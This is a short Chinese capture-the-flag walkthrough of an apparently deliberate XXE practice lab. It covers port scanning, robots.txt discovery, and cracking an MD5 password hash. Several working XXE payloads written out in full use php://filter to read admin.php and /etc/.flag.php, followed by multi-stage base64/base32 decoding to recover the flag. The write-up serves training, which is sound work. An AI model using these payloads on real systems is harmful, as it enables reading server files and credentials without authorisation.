首先我们进行端口扫描
扫出来端口之后去尝试得出地址为183
发现robots.txt文件
由此我们就得到了两个目录
我们先进入xxe目录,并开始登录抓包
并进入重放器在xml里面构造语句
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
把那些码复制下来进行base64解码
解码完成后放下翻发现有用户名和密码,用户名为administhebest,但是密码是被md5加密的
那么我们把密码复制下来去md5解密,得出密码admin@123
然后我们去尝试登录
看到一个flag我们点击查看
进入xee目录进行抓包并读取文件
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=./flagmeout.php">
]>
<root><name>&admin;</name><password>admin</password></root>
又得到一段编码复制下来进行base64解码
然后再对括号里的进行base32解码
发现还得进行base64解码把base32解码完成之后的复制进行64解码
得到了flag的目录那么我们再次进入到xee目录的界面进行抓包读取
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">
]>
<root><name>&admin;</name><password>admin</password></root>
我们再次进行base64解码
解码之后得出一段php代码
我们打开小皮面板进入自己网站的根目录,创建一个php文件进行访问
把刚刚解码的php代码复制进去,并加上<?php 的开头
保存然后进行访问
这里报错找不到页面肯能是php版本的问题,我们进入小皮->网站->管理->php版本,更换一个版本
这里我改成5.3.29了
下载成功后再进入php版本进行切换
换了之后看到报错内容里面有flag在花括号里